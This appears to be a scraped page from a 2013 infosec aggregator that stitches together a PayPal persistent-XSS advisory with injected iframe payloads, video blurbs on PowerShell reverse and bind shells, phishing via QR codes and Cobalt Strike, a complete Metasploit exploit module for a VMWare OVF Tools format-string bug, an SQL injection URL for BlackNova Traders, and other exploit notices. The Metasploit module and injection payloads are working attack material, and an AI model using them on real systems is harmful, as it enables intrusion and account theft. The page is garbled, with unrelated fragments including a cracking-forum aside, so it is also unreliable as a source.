PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4 and 9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Vendor Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official Paypal ecommerce website application.

Report-Timeline:
================
2012-07-30: Researcher Notification & Coordination
2012-07-31: Vendor Notification
2012-08-09: Vendor Response/Feedback
2013-01-14: Vendor Fix/Patch
2013-01-28: Public or Non-Public Disclosure

Status:
========
Published

Affected Products:
==================

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A persistent input validation vulnerability is detected in the official Paypal website application (Customer/Pro/Seller). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the paypal web service. The vulnerability is located in the Zertifikatsänderung des öffentlichen Schlüssels module with the bound vulnerable name & id mail listing parameters. The vulnerability can be exploited by remote attackers with low or medium required user interaction and with a privileged Customer/Pro/Seller account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Module(s):
[+] Zertifikatsänderung des öffentlichen Schlüssels (Delete too!)

Vulnerable Parameter(s):
[+] NAME & ID

Affected Section(s):
[+] Notification Mail

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with a privileged user account and medium or high required user interaction. For demonstration or reproduce ...

Review: Certificate Change Notification - Username & Company

<html><head>
<title>Zertifikatsänderung des öffentlichen Schlüssels</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>Betreff: </b>Zertifikatsänderung des öffentlichen Schlüssels</td></tr><tr><td><b>Von: </b>"service@paypal.de" <service@paypal.de> </td></tr><tr><td><b>Datum: </b>Sat, 28 Jul 2012 22:49:45 -0700</td></tr></tbody></table><table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>denjo <x01445@gmail.com></td></tr></tbody></table><br>
<div class="moz-text-plain"><pre wrap="">Guten Tag benjo >"<iframe src="http://vuln-lab.com">!

Hiermit informieren wir Sie darüber, dass Sie erfolgreich ein Zertifikat des öffentlichen Schlüssels mit der folgenden ID hinzugefügt haben: 9XG235W6L7R92.

HINWEIS: Wenn Sie kein Zertifikat des öffentlichen Schlüssels hinzufügen möchten, setzen Sie sich umgehend unter der auf der nächsten Seite angegebenen Rufnummer telefonisch mit uns in Verbindung: <a class="moz-txt-link-freetext" href="https://www.paypal.com/de/contact-phone">https://www.paypal.com/de/contact-phone</a>

Herzliche Grüße
Ihr PayPal-Team

Review: Certificate Change Notification - ID

<html><head>
<title>Zertifikatsänderung des öffentlichen Schlüssels</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td> <b>Betreff: </b>Zertifikatsänderung des öffentlichen Schlüssels</td></tr><tr><td><b>Von: </b>"service@paypal.de" <service@paypal.de></td></tr><tr><td><b>Datum: </b>Sat, 28 Jul 2012 22:49:45 -0700</td></tr></tbody></table>
<table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>denjo schenjo <x01445@gmail.com></td></tr></tbody></table><br>
<div class="moz-text-plain"><pre wrap="">Guten Tag denjo schenjo!

Hiermit informieren wir Sie darüber, dass Sie erfolgreich ein Zertifikat des öffentlichen Schlüssels mit der folgenden ID hinzugefügt haben: 9XG137W6L7R92>"<iframe src="http://vuln-lab.com">.

HINWEIS: Wenn Sie kein Zertifikat des öffentlichen Schlüssels hinzufügen möchten, setzen Sie sich umgehend unter der auf der nächsten Seite angegebenen Rufnummer telefonisch mit uns in Verbindung: <a class="moz-txt-link-freetext" href="https://www.paypal.com/de/contact-phone">https://www.paypal.com/de/contact-phone</a>

Herzliche Grüße
Ihr PayPal-Team

Note: The ID notification will be sent with the request of the changes. The attacker can manipulate the value by injecting via POST. The select of the notification will be handled by the post request and not by a special request to the real existing updated input of the database. The result of the request notification is the execution of the persistent malicious script code out of the ID context.

Solution:
=========
2013-01-14: Vendor Fix/Patch by PayPal Security Team

Risk:
=====
The security risk of the persistent input validation vulnerability is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Copyright © 2012 | Vulnerability Laboratory

Source: PacketStorm
  7. Description: In this video I will show you how to generate a Powershell script for a reverse connection. Using this script you can get the shell easily. But this script only works hidden when you execute it remotely.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Set -- Powershell - Reverse Shell
  8. Description: In this video I will show you how to use the Social Engineering toolkit for making a QR code. Using the QR code you can redirect a user to your malicious webpage; maybe you can perform a phishing attack and a lot more.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Set - Qr Code + Beef + Smartphone
  9. Description: As smartphones enter the workplace, sharing the network and accessing sensitive data, it is crucial to be able to assess the security posture of these devices in much the same way we perform penetration tests on workstations and servers. However, smartphones have unique attack vectors that are not currently covered by available industry tools. The smartphone penetration testing framework, the result of a DARPA Cyber Fast Track project, aims to provide an open source toolkit that addresses the many facets of assessing the security posture of these devices. We will look at the functionality of the framework including information gathering, exploitation, social engineering, and post exploitation through both a traditional IP network and through the mobile modem, showing how this framework can be leveraged by security teams and penetration testers to gain an understanding of the security posture of the smartphones in an organization. We will also show how to use the framework through a command line console, a graphical user interface, and a smartphone based app. Demonstrations of the framework assessing multiple smartphone platforms will be shown.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Introducing The Smartphone Penetration Testing Framework
  10. Description: HTML5 opens up a wide and wonderful new world for Web Designers to explore - bringing fantastic new features that were previously only possible via Flash or horribly over-complicated Javascript. And HTML5 is not a future technology - chances are your favourite browser already has excellent support built in (unless you are still using IE). In this talk we will look at HTML5 from an attacker's view-point. Because not only does HTML5 bring us the Semantic web, editable content, inbuilt form validation, local storage, awesome video support and the long overdue death of div - it also opens up a host of new opportunities for attackers. We'll look at some of the troublesome new attacks that this new HTML5 standard introduces, how attackers can leverage these attacks to cause untold havoc on your machine, and how - with a little bit of help from some not so over-complicated Javascript - we can build Botnets in your Browser! I HAVE SHOES! BANANA!

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Brucon 2012 - Html5 - A Whole New Attack Vector
  11. Description: This video is a post exploitation demo: I will show you how to bind a shell using a Powershell script and metasploit. In this demo I will use the Social-Engineering tool for the Powershell script and Metasploit for exploitation. Now once you get the meterpreter shell, generate the Powershell script, use the Metasploit post-exploitation module for Powershell script execution, and scan your target using nmap; you will get one open port named with (*BACKDOOR*).

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Bind Shell On Windows Using Metasploit + Powershell Script.
  12. Description: In this video I will show you the basic usage of the Maltego Advanced Information gathering tool. Maltego is a very powerful GUI based Information gathering tool. Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in an easy to understand format.

Paterva / Maltego

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Information Gathering With Maltego
  13. Description: Nowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and running critical business processes. In recent years it has become a hot topic in information security, at the time that headlines about hacks against SAP systems increase every day. Although fixes and countermeasures are released monthly by SAP at an incredible rate, the available security knowledge is limited and some components are still not well covered. SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers and it's a core part of any ABAP-based SAP Netweaver installation. Therefore, if an attacker is able to compromise this component, this would result in a total takeover of a SAP system. In recent years, the Diag protocol has received some attention from the security community and several tools were released focused on decompression and sniffing. Nevertheless, the protocol specification is not public and internal components and inner workings remain unknown; the protocol was not understood and there is no publicly available tool for active exploitation of real attack vectors. This talk is about taking SAP penetration testing out of the shadows and shedding some light into SAP Diag, by introducing a novel way to uncover vulnerabilities in SAP software through a set of tools that allows analysis and manipulation of the SAP Diag protocol. In addition, we will show how these tools and the knowledge acquired while researching the protocol can be used for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server applications: man-in-the-middle attacks, RFC calls injection, rogue SAP servers deployment, SAP GUI client-side attacks and more. As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Brucon 2012 - Uncovering Sap Vulnerabilities: Dissecting And Breaking The Diag Protocol
  14. Description: Looking for vulnerabilities in closed source software is particularly difficult when the researcher is confronted with proprietary and/or undocumented protocols. Several approaches could be taken to attack this problem, for example full reverse engineering or dumb fuzzing. Unfortunately, these are either incredibly time/brain consuming or highly inefficient. In this talk another way will be shown, namely the manipulation of client software using binary instrumentation techniques in order to use them as a kind of 'double agents' against the server they are talking to. Some small tools and code examples will be released after the talk for everybody to play with.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Brucon 2012 - How I Met Your Pointer (Hijacking Client Software For Fuzz And Profit)
  15. VMWare OVF Tools Format String Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMWare OVF Tools Format String Vulnerability',
      'Description'    => %q{
          This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
        Windows. The vulnerability occurs when printing error messages while parsing a
        malformed OVF file. The module has been tested successfully with VMWare OVF Tools
        2.1 on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jeremy Brown', # Vulnerability discovery
          'juan vazquez'  # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-3569' ],
          [ 'OSVDB', '87117' ],
          [ 'BID', '56468' ],
          [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops'     => true,
          'BadChars'        => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22",
          'StackAdjustment' => -3500,
          'PrependEncoder'  => "\x54\x59", # push esp # pop ecx
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'ECX',
              'BufferOffset'   => 6
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # vmware-ovftool-2.1.0-467744-win-i386.msi
          [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
            {
              'Ret'          => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
              'AddrPops'     => 98,
              'StackPadding' => 38081,
              'Alignment'    => 4096
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 08 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']),
      ], self.class)
  end

  def ovf
    my_payload = rand_text_alpha(4)          # ebp
    my_payload << [target.ret].pack("V")     # eip # call esp
    my_payload << payload.encoded

    fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
    fs << rand_text_alpha(target['Alignment'])   # Align to 0x11000
    fs << my_payload
    # 65536 => 0x10000
    # 27 => Error message prefix length
    fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
    fs << "%08x" * target['AddrPops'] # Reach saved EBP
    fs << "%hn"                       # Overwrite LSW of saved EBP with 0x1000

    ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <References>
    <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
  </References>
  <DiskSection>
    <Info>Virtual disk information</Info>
    <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
  </DiskSection>
  <VirtualSystem ovf:id="Small VM">
    <Info>A virtual machine</Info>
  </VirtualSystem>
</Envelope>
    EOF

    ovf_file
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}'. This file should be opened with VMWare OVF 2.1")
    file_create(ovf)
  end

end

Source: VMWare OVF Tools Format String Vulnerability
  16. BlackNova Traders, a web-based game similar to the BBS game TradeWars, suffers from a remote SQL injection vulnerability.

BlackNova Traders (SQL Injection) Vulnerability

Software : BlackNova
Date : 2/12/2013
Vendor : http://blacknova.net/
Download : http://sourceforge.net/projects/blacknova/
Language : PHP
Tested on: Windows OS + Apache Server
Author : ITTIHACK
Home : http://ittihack.com

Description
BlackNova Traders is a web-based, multi-player space exploration game inspired by the popular BBS game of TradeWars. It is coded using PHP, SQL, and Javascript.

Vulnerable File: news.php

Line# 43 :
if (array_key_exists('startdate', $_GET) && ($_GET['startdate'] != ''))

Exploit:
http://localhost/bnt/news.php?startdate=2013/02/11[SQLi]

Free Syria

Source: PacketStorm
  17. With a little willpower you can crack it with this one too. The second option would be COAILII v2.0. Don't expect anyone to help you, I shut your post down so hard it rang.

//Edit: Seriously now, that's really what it's called. (lol)
  18. Description: This presentation is the new and improved anti-forensics version of those "Stupid Pet Tricks" segments on late night US talk shows. Nothing ground-breaking here, but there may be some ideas and techniques presented that forensic investigators haven't considered or encountered.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Brucon 2012 - Moar Anti-Forensics For The Louise
  19. Description: Why send someone an executable when you can just send them a sidebar gadget? We will be talking about the windows gadget platform and the nastiness that can be done with it, how gadgets are made, how they are distributed and, more importantly, their weaknesses. Gadgets are comprised of JS, CSS and HTML and are applications that the Windows operating system has embedded by default. As a result there are a number of interesting attack vectors that are interesting to explore and take advantage of. We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Brucon 2012 - We Have You By The Gadgets
  20. Description: This video demonstrates Cobalt Strike's ability to connect to and manage multiple servers as part of a sophisticated red team attack. One server sends phishing emails, another hosts the recon website, another hosts the attack, another receives beacons from compromised systems, and two others are used for post-exploitation. At the end of your engagement, Cobalt Strike will aggregate data from all the servers to provide a single report that documents your engagement.

http://blog.strategiccyber.com/2013/02/12/a-vision-for-distributed-red-team-operations/

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: http://www.securitytube.net/video/6892
  21. Description: Welcome to Part 7 of the series! In this video, I discuss the great tool airolib-ng, which is great for speeding up the WPA/WPA2 cracking process.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Aircrack-Ng Megaprimer Part 7: Airolib-Ng
  22. IRIS Citations Management Tool (post auth) Remote Command Execution

Here is a bug that I finally found time to write about
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

The attached contains my mini framework, exploit and screenshot.

Cheers!
~ aeon

# I Read It Somewhere (IRIS) <= v1.3 (post auth) Remote Command Execution
# download: http://ireaditsomewhere.googlecode.com
# Notes:
# - Found this in my archive, dunno how long this has been 0Day for... but I had no use for it obviously.
# - Yes! ..the code is disgusting, but does the job
# - Sorry if I ripped your code, it worked for me and I don't reinvent wheels so thank you!
# ~ aeon (https://infosecabsurdity.wordpress.com/)
#
# Exploit requirements:
# ~~~~~~~~~~~~~~~~~~~~~
#
# - A valid account as at least a user
# - The target to have outgoing internet connectivity

Exploit: http://www.exploit-db.com/sploits/24480.tar.gz

Source: IRIS Citations Management Tool (post auth) Remote Command Execution
  23. IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability

# Exploit Title: IP.Gallery 4.2.x and 5.0.x persistent XSS vulnerability
# Date: 8/2/2013
# Exploit Author: Mohamed Ramadan
# Author HomePage: http://www.Attack-Secure.com
# Author Twitter : https://twitter.com/Attack_Secure
# Vendor Homepage: http://www.invisionpower.com/
# Software Link: http://www.invisionpower.com/apps/gallery/
# Version: IP.Gallery 4.2.x and 5.0.x

The image title is vulnerable to a persistent XSS vulnerability which allows any normal member to hack any administrator account or any other member account. We contacted the vendor and reported this issue to them and they fixed it and released this patch:
http://community.invisionpower.com/topic/379028-ipgallery-42x-and-50x-security-update/

Here is a video demonstrating the attack in action:
https://docs.google.com/file/d/0B_cpjifQmPbZMmxVcEdqU3A1aU0/edit?usp=sharing

and here is another video demonstrating how to bypass httponly cookies:
https://docs.google.com/file/d/0B_cpjifQmPbZemFsbFJDRnVkVTA/edit?usp=sharing

Mohamed Ramadan ( Attack-Secure.com )

Source: IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability